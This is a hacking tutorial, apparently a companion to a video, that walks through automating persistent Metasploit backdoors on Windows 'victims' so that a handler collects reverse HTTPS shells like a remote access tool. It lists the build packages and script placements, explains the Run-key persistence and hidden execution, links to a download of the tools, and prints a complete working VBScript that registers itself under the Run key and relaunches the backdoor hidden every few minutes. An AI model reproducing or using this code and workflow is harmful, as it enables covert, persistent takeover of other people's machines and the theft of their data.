Today we will be automating persistent backdoors on our target using the Metasploit Framework. Lots of fun! 😀
In an earlier video, we saw how to craft an undetectable backdoor using the Metasploit Framework tools. Today, we are going to automate the process of sending such a backdoor to our victim(s) so that our handler works much like a RAT (remote administration tool) and accepts reverse HTTPS connections from several victims simultaneously.
To start, we will need the following packages (the MinGW cross-compilers used to build the Windows executable, plus zip/unzip):
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils zip unzip
How does it work?
We will use the vanish script to create our undetectable backdoor, and launch the Metasploit Framework using the autopersist script. In turn, autopersist waits for the victim to execute the backdoor for the first time. Once they do, it automatically interacts with the new session and uploads the needed files (persist.vbs, a VBScript, and reverse.exe, the backdoor). Then, autopersist adds an entry under the Windows ‘Run’ registry key, which launches the listed programs every time the user logs on. Don’t worry, the backdoor is hidden as soon as it is executed: it opens no window, and the only place it shows up is the process list in Task Manager.
* Read these instructions and place the scripts in the right directories, or problems will arise.
vanish.sh: Place this script in the root of the framework folder (in bt5r1: /pentest/exploits/framework/). If you would like to change the payload, you will have to edit it manually. Read through this script before executing it to make sure it fits your needs, and don’t forget to chmod +x it. This script is the work of astr0baby, vanish3r and deathc0rps ~credits go to them.
autopersist.rc: Place this script in the meterpreter scripts folder (in bt5r1: /pentest/exploits/framework/scripts/meterpreter/). Here you will have to manually insert the LHOST & LPORT (the address and port your handler listens on, which the backdoor built by vanish must match), so read through this before executing it. This script is minimally edited by me; all credits go to chris from OMGSecurity.
persist.vbs: Place this script in /var/www/. It is sent to the victim by autopersist.rc, and once running it relaunches the backdoor every x milliseconds. As default I left 200000 (WScript.Sleep counts in milliseconds, so a little over three minutes). This gives a seamless feel to the attack, but you might wait a while before you get your shell. If you wish to stop getting a shell back from the victim(s), simply kill the ‘wscript.exe’ process ~as shown in the video below.
reverse.exe: This is a copy of the backdoor.exe created by vanish; it is automatically copied to /var/www/ by the script.
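To make the victim-side half of the flow concrete, here is an added example of what a persist.vbs-style relauncher does. It is not the script from the download, and it does not reproduce chris’s or vanish’s code: the drop path C:\Windows\Temp\reverse.exe and the Run value name "persist" are assumptions for the example. The Run key write is shown here inside the VBScript for illustration; in the setup described above, autopersist.rc writes that key from the meterpreter session instead.

```vbscript
' Example relauncher in the spirit of persist.vbs (added illustration, not the
' downloadable script). Paths and the Run value name are assumptions.
Option Explicit

Const BACKDOOR_PATH = "C:\Windows\Temp\reverse.exe"   ' assumed drop location
Const INTERVAL_MS   = 200000                          ' WScript.Sleep takes ms: 200 s, a bit over 3 min
Const RUN_VALUE     = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\persist"

Dim shell, fso
Set shell = CreateObject("WScript.Shell")
Set fso   = CreateObject("Scripting.FileSystemObject")

' Register this script under the per-user Run key so the loop comes back
' after a reboot. //B runs wscript in batch mode (no error dialogs), and the
' path is quoted so a space in the directory name does not break the command.
shell.RegWrite RUN_VALUE, "wscript.exe //B """ & WScript.ScriptFullName & """", "REG_SZ"

' Launch the backdoor with window style 0 (hidden) and without waiting for it
' to exit, then sleep and repeat. Every pass hands the handler a fresh reverse
' connection; ending the wscript.exe process stops new callbacks, exactly as
' described above.
Do While True
    If fso.FileExists(BACKDOOR_PATH) Then
        shell.Run """" & BACKDOOR_PATH & """", 0, False
    End If
    WScript.Sleep INTERVAL_MS
Loop
```

Two details worth checking against your own copy of persist.vbs: the interval is in milliseconds, not seconds, and the Run key is per-user (HKCU), so it only fires when that same user logs on. Writing the same value under HKLM would cover every user but needs administrative rights on the victim.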
Click here to download the files: [ DOWNLOAD ]
Note: This video is about “automating persistent backdoors”, as the title suggests. Spreading the backdoor, and techniques for doing so, are out of the scope of this tutorial and will perhaps make their way into a future video. There is also a previous video to this one where I go over encoding the backdoor.